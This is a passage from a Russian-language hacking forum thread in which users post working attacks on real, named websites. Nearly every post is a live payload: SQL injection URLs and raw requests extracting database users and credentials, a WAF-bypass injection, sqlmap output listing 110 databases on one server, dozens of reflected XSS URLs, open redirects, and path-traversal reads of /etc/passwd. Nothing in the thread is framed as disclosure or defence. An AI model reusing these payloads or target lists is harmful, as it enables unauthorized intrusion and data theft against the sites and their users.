Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    822
    Likes Received:
    1,054
    Reputations:
    29
    HTML:
    https://www.mournhockey.com.ua/go.php?http://FFFFFFF.org
    http://iz.com.ua/engine/go.php?url=aHR0cDovL2dvb2dMZS5jb20=
    
    OpenRedirect

    HTML:
    https://bosa.in.ua/event/?id=1'+and+false+%55%6e%49%6f%4e+%2f%2a%21%31%32%33%34%35%53%65%4c%45%63%74%2a%2f+1,user(),3,4,5,6,7,8,9,database(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,version(),6,7,8,9,0,1+--+-
     
    #301 BabaDook, 17 Mar 2018
    Last edited: 20 Mar 2018
  2. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    822
    Likes Received:
    1,054
    Reputations:
    29
    Это очень странно, тут гораздо больше вопросов чем ответов, но такова жизнь
    Я решил назвать эту технику "Ломем фалоимитатором"
    К сожалению нам этого ничего не даёт, просто забавно мне так показалось
     
    Vip77 and CKAP like this.
  3. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    312
    Likes Received:
    53
    Reputations:
    20
    Хахах интересно как тебе это в голову пришло) Кодовое слово авито?:D
     
  4. Vip77

    Vip77 Elder - Старейшина

    Joined:
    29 Sep 2012
    Messages:
    312
    Likes Received:
    53
    Reputations:
    20
    Code:
    https://www.edmunds.com/a/?":""});alert(document.cookie);//
    http://oregonstate.edu/training/course_search.php?subject="><script>alert(999)</script>
    https://lyricstranslate.com/?page="><script>alert(7889789)</script>
    http://720pizle.com/ara.asp?a="><script>alert(7889789)</script>
    http://epinions.com/search/books/63715?"><script>alert(6456456)</script>
    https://mgronline.com/south/1232/search?searchTxt="><script>alert(045839)</script>
    http://naszemiasto.pl/firmy/,polska,78425,21.html?miasto="><script>alert(4389)</script>
    http://www3.gogoanime.tv/"><script>alert(4389)</script>
    https://bursadabugun.com/ruya-tabirleri/?q[keyword]="><script>alert(4389)</script>
    https://computerhoy.com/listas/internet/mejores-cascos-auriculares-inalambricos-2016-32365?page=</title><script>alert(4389)</script>
    https://warframe.market/</script><script>alert(4389)</script>
    https://goal.in.th/%E0%B8%9C%E0%B8%A5%E0%B8%9A%E0%B8%AD%E0%B8%A5%E0%B8%A2%E0%B9%89%E0%B8%AD%E0%B8%99%E0%B8%AB%E0%B8%A5%E0%B8%B1%E0%B8%87/?Line="><script>alert(4389)</script>
    http://www.gazetevatan.com/Default.aspx?aType=';alert();//
    http://thebitcoincode.com/video.php?poster="><script>alert(4389)</script>
    https://gamebanana.com/tools?"><script>alert(4389)</script>
    https://indosport.com/"><script>alert(4389)</script>
    http://brasilescola.uol.com.br/"><script>alert(4389)</script>
    https://watchasian.co/"><script>alert(4389)</script>
    https://mgronline.com/south/1232/search?searchTxt="><script>alert(4389)</script>
    http://portail.free.fr/services/pagesjaunes/bons-plans.php?where="><script>alert(4389)</script>
    http://minnstate.edu/jobs/searchResults.php?"><script>alert(4389)</script>
    https://eadaily.com/"><script>alert(00088)</script>
    http://projectfreetv.bz/hd/project.php?title=<script>alert(4389)</script>
    http://cnrtl.fr/lexiques/morphalou/licence_morphalou.php?version="><script>alert(4389)</script>
    
     
    #304 Vip77, 23 Mar 2018
    Last edited: 23 Mar 2018
    man474019 and BabaDook like this.
  5. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    822
    Likes Received:
    1,054
    Reputations:
    29
    http://bgadmin.gov.ua/

    post :
    user_token='+and+extractvalue(0x0a,(concat(0x0a,(select+user()))))#

    resul:
    <div class=empty>ПОМИЛКА <br>XPATH syntax error: '
    [email protected]'>>SELECT cvi_id,cvi_clc_id FROM admin_visits WHERE cvi_dom_id=1 AND cvi_token='' and extractvalue(0x0a,(concat(0x0a,(select user()))))#' AND cvi_ts_exit=0 LIMIT 1 (MYSQLi:1105)<br>/home/bingosites/bingo.softbi.info/phpsite/_engineBS.php (93)</div>
    Fatal error: Call to a member function fetch_assoc() on a non-object in /home/bingosites/bingo.softbi.info/phpsite/_engineBS.php on line 94



    http://ricplus.ru/view-news.php?id=1'+And+falsE+uNiOn+sEleCT+1,2,uSeR(),4+--+-
    http://bestindustrygroup.com/news.php?id=-1+UnIoN+SeLEct+1,2,3,user(),5,6,7+--+-
    http://www.niihim.ru/news.php?id=1+UnIoN+SeLEct+1,2,user(),4,5+--+-
     
    #305 BabaDook, 29 Mar 2018
    Last edited: 29 Mar 2018
    t0ma5, cat1vo and crlf like this.
  6. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    426
    Likes Received:
    76
    Reputations:
    18
    https://forum.antichat.ru/threads/426171/page-6
    Выкладывал уже
     
    sepo, BabaDook and crlf like this.
  7. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    822
    Likes Received:
    1,054
    Reputations:
    29
  8. fiji

    fiji New Member

    Joined:
    19 Oct 2018
    Messages:
    3
    Likes Received:
    0
    Reputations:
    5
    Code:
    http://wrestling.work/eventchapter.php?id=2%27+union+select+1,2,(select(@x)from(select(@x:=0x00),(select(0)from(tione_igs.applications)where(0x00)in(@x:=concat(@x,0x3c62723e,user,0x3a,pass))))x),4,5,6,7,8,9,10--+1
     
  9. lukeone

    lukeone Member

    Joined:
    7 May 2017
    Messages:
    6
    Likes Received:
    17
    Reputations:
    1
    Code:
    http://cpa-monsters.ru/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
    
    Parameter: #1* (URI)
    Type: boolean-based blind
    Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
    Payload: http://cpa-monsters.ru:80/" AND MAKE_SET(1782=1782,4508) AND "lURK"="lURK
    Vector: AND MAKE_SET([INFERENCE],[RANDNUM])
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: http://cpa-monsters.ru:80/" AND (SELECT 2809 FROM(SELECT COUNT(*),CONCAT(0x716b626a71,(SELECT (ELT(2809=2809,1))),0x716b766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "qGaW"="qGaW
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: http://cpa-monsters.ru:80/";SELECT SLEEP(5)#
    Vector: ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: http://cpa-monsters.ru:80/" AND SLEEP(5) AND "IisV"="IisV
    Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])

    available databases [110]:
    [*] 1poverennaya.ru
    [*] 3dschool.akadem-art.ru
    [*] acmoda_fashion
    [*] akadem-art.ru
    [*] amsterdam.ru
    [*] amur-tiger
    [*] api.olit.su
    [*] apteki.ru
    [*] at
    [*] ayashiclimat
    [*] berendeevo
    [*] bitrix_55
    [*] cargoflies.ru
    [*] civlife
    [*] cookies
    [*] cpa
    [*] cpa-monsters.ru
    [*] crypto
    [*] cv79250_db
    [*] db1050525_rpfm
    [*] dev.check-car.io
    [*] dish.ru
    [*] docdoc
    [*] dojoy.ru
    [*] dreamwood
    [*] el-torg.ru
    [*] fefectu_fikcii
    [*] game4art.ru
    [*] gidrolica
    [*] greencontinent.bio
    [*] hockeyfamily
    [*] hostel
    [*] information_schema
    [*] informed
    [*] irasmarovoz
    [*] kordik-psyhelp
    [*] kz_health
    [*] lecture
    [*] led1080.ru
    [*] lesspas
    [*] light
    [*] lotmo
    [*] mailer
    [*] maxphoto
    [*] medelement.ru
    [*] messenger
    [*] metalnastil.ru
    [*] miel.ru
    [*] modelery
    [*] mototelega
    [*] mysql
    [*] nanokeratin-shop
    [*] new.olit.su
    [*] new_olit
    [*] newoleg
    [*] olit_su
    [*] olmatveeva.ru
    [*] pdns
    [*] performance_schema
    [*] photoluxor
    [*] picture
    [*] pineapple
    [*] powerdns
    [*] prazdnik
    [*] pressnastil.ru
    [*] profdoctors.ru
    [*] push
    [*] radio.ru
    [*] recraft.ru-yii
    [*] redmine
    [*] rekomendacii
    [*] remcraft.ru
    [*] remcraft.ru-new
    [*] remcraft.ru-new1!!
    [*] resthistory
    [*] rlogistika
    [*] seobirds
    [*] seorakerus
    [*] seowant.ru
    [*] sflegaladvice
    [*] siluet.su
    [*] sitemanager0
    [*] skld
    [*] social
    [*] sound_olit
    [*] sound_olit_su
    [*] sport
    [*] spz-rus.ru
    [*] stroynastil.ru
    [*] stroynastil.ru1
    [*] sveng
    [*] telegramm
    [*] test
    [*] umgear.ru
    [*] union.ru
    [*] union.ru-old
    [*] vault-pdm.ru
    [*] velespro.com
    [*] videoportal
    [*] visagestyle
    [*] water-check.ru
    [*] wawtalk.io
    [*] webmonsters
    [*] whoknow.ru
    [*] yandex_bot
    [*] yiilab
    [*] ymga.ru
    [*] ymga.ru-new
    [*] zabbix
    [*] zaem-info.ru
     
    karkajoi, Mie2soft and Octavian like this.
  10. Franky_T

    Franky_T Level 8

    Joined:
    6 Nov 2018
    Messages:
    7
    Likes Received:
    17
    Reputations:
    4
    Здравствуйте)
    На форуме первый день, попробую тоже.

    1. SQL-инъекция с обходом WAF
    Code:
    GET /noticia.php?id=-738+/*!50000union*/+/*!50000select*/+111,222,/*!50000gROup_cONcat(table_name,0x0a)%20*/,444,555,666,777,888,999,1010,1111,1212,1313,1414,1515,1616,1717+from+/*!50000inforMAtion_schema*/.tables+%20/*!50000wHEre*/+/*!50000taBLe_scheMA%20*/like+database()--+ HTTP/1.1
    Host: www.cdlmacapa.com.br
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    
    2. SQL-инъекция с выводом в ошибке
    Code:
    http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x3a,(select+user()+limit+0,1)))
    
     
  11. Franky_T

    Franky_T Level 8

    Joined:
    6 Nov 2018
    Messages:
    7
    Likes Received:
    17
    Reputations:
    4
    Еще немножко - теперь LFI.
    Code:
    http://www.unisescon.org.br/index.php?pagina=/etc/passwd&evento=13774
    
    https://www.fecic.es/admin/index.php?pagina=descargar&doc=../../../../../../../../../../../../etc/passwd&linial=true&seccio=premsa&tipus=1&[email protected]```
    
    http://www.bolyai-zenta.edu.rs/index.php?page=../../../../../../../../../../../etc/passwd
    
    http://www.crt.unige.it/EN/index.php?pagina=php://filter/convert.base64-encode/resource=/etc/passwd
    
    
     
    #312 Franky_T, 10 Nov 2018
    Last edited: 10 Nov 2018
    crlf, dmax0fw, Pirnazar and 2 others like this.
  12. BabaDook

    BabaDook Level 8

    Joined:
    9 May 2015
    Messages:
    822
    Likes Received:
    1,054
    Reputations:
    29

    Тут можно без лимита
    http://steelflex.com.br/subcategoria.php?id=1+AND+extractvalue(1,concat(0x3a,(select+user())))

    Тут так
    http://www.crt.unige.it/EN/index.php?pagina=/etc/passwd
     
    Franky_T likes this.
Loading...